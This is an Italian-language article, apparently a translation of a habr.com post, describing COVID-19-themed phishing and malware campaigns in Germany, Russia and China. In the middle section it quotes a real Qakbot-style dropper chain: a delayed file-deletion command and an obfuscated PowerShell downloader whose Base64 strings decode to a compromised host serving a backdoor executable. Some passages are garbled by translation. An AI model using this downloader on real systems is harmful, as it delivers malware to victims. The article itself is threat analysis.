Gli aggressori continuano a sfruttare l’argomento COVID-19, creando sempre più minacce per gli utenti fortemente interessati a tutto ciò che riguarda l’epidemia. IN Abbiamo già parlato di quali tipi di malware sono apparsi sulla scia del coronavirus e oggi parleremo delle tecniche di ingegneria sociale con cui gli utenti di diversi paesi, inclusa la Russia, si sono già imbattuti. Le tendenze generali e gli esempi sono sotto taglio.
Ricorda dentro Abbiamo parlato del fatto che le persone sono disposte a leggere non solo sul coronavirus e sull’andamento dell’epidemia, ma anche sulle misure di sostegno finanziario? Ecco un buon esempio. Un interessante attacco di phishing è stato scoperto nello stato tedesco della Renania Settentrionale-Vestfalia o NRW. Gli aggressori hanno creato copie del sito web del Ministero dell’Economia (), dove chiunque può richiedere assistenza finanziaria. Un programma del genere esiste effettivamente e si è rivelato vantaggioso per i truffatori. Dopo aver ricevuto i dati personali delle loro vittime, hanno presentato una domanda sul sito web reale del ministero, ma hanno indicato altre coordinate bancarie. Secondo i dati ufficiali, fino alla scoperta del sistema sono state avanzate 4mila richieste false. Di conseguenza, 109 milioni di dollari destinati ai cittadini colpiti sono caduti nelle mani dei truffatori.
Desideri un test gratuito per il COVID-19?
Un altro esempio significativo di phishing a tema coronavirus è stato nelle e-mail. I messaggi hanno attirato l'attenzione degli utenti con l'offerta di sottoporsi a test gratuiti per l'infezione da coronavirus. In allegato a questi c'erano casi di Trickbot/Qakbot/Qbot. E quando coloro che desideravano verificare la propria salute hanno iniziato a "compilare il modulo allegato", sul computer è stato scaricato uno script dannoso. E per evitare test sandboxing, lo script ha iniziato a scaricare il virus principale solo dopo un po' di tempo, quando i sistemi di protezione erano convinti che non si sarebbe verificata alcuna attività dannosa.
Anche convincere la maggior parte degli utenti ad abilitare le macro è stato facile. Per fare ciò è stato utilizzato un trucco standard: per compilare il questionario è necessario prima abilitare le macro, il che significa che è necessario eseguire uno script VBA.
Come puoi vedere, lo script VBA è appositamente mascherato dagli antivirus.
Windows dispone di una funzione di attesa in cui l'applicazione attende /T <secondi> prima di accettare la risposta predefinita "Sì". Nel nostro caso, lo script ha atteso 65 secondi prima di eliminare i file temporanei:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
E durante l'attesa è stato scaricato il malware. A questo scopo è stato lanciato uno speciale script PowerShell:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Dopo aver decodificato il valore Base64, lo script PowerShell scarica la backdoor situata sul server web precedentemente violato dalla Germania:
http://automatischer-staubsauger.com/feature/777777.pnge lo salva con il nome:
C:UsersPublictmpdirfile1.exe
Cartella ‘C:UsersPublictmpdir’ viene eliminato durante l'esecuzione del file 'tmps1.bat' che contiene il comando cmd /c mkdir ""C:UsersPublictmpdir"".
Attacco mirato alle agenzie governative
Inoltre, gli analisti di FireEye hanno recentemente segnalato un attacco APT32 mirato contro le strutture governative di Wuhan, nonché contro il Ministero cinese per la gestione delle emergenze. Uno degli RTF distribuiti conteneva un collegamento a un articolo del New York Times intitolato . Tuttavia, dopo averlo letto, è stato scaricato un malware (gli analisti di FireEye hanno identificato l'istanza come METALJACK).
È interessante notare che, al momento del rilevamento, nessuno degli antivirus ha rilevato questa istanza, secondo Virustotal.
Quando i siti Web ufficiali sono inattivi
L’esempio più eclatante di attacco phishing è avvenuto proprio l’altro giorno in Russia. La ragione di ciò è stata la nomina di un beneficio tanto atteso per i bambini dai 3 ai 16 anni. Quando il 12 maggio 2020 è stato annunciato l’inizio dell’accettazione delle domande, milioni di persone si sono precipitate sul sito web dei servizi statali per chiedere l’aiuto tanto atteso e hanno fatto crollare il portale non peggio di un attacco DDoS professionale. Quando il presidente ha affermato che “i servizi governativi non sarebbero in grado di far fronte al flusso di richieste”, la gente ha iniziato a parlare online del lancio di un sito alternativo per accettare le richieste.
Il problema è che diversi siti hanno iniziato a funzionare contemporaneamente e, mentre uno, quello vero su posobie16.gosuslugi.ru, accetta effettivamente domande, altri .
I colleghi di SearchInform hanno trovato circa 30 nuovi domini fraudolenti nella zona .ru. Infosecurity e Softline Company hanno rintracciato più di 70 siti web simili di servizi governativi falsi dall'inizio di aprile. I loro creatori manipolano simboli familiari e usano anche combinazioni delle parole gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie e così via.
Hype e ingegneria sociale
Tutti questi esempi confermano solo che gli aggressori stanno monetizzando con successo il tema del coronavirus. E quanto più alta è la tensione sociale e quanto meno chiare sono le questioni, tanto maggiori sono le possibilità che i truffatori rubino dati importanti, costringano le persone a rinunciare ai propri soldi o semplicemente hackerano più computer.
E poiché la pandemia ha costretto persone potenzialmente impreparate a lavorare in massa da casa, non solo i dati personali, ma anche quelli aziendali sono a rischio. Recentemente, ad esempio, anche gli utenti di Microsoft 365 (ex Office 365) sono stati vittime di un attacco di phishing. Le persone ricevevano enormi quantità di messaggi vocali "persi" come allegati alle lettere. Tuttavia, i file erano in realtà una pagina HTML a cui venivano indirizzate le vittime dell'attacco . Di conseguenza, perdita di accesso e compromissione di tutti i dati dell'account.
Fonte: habr.com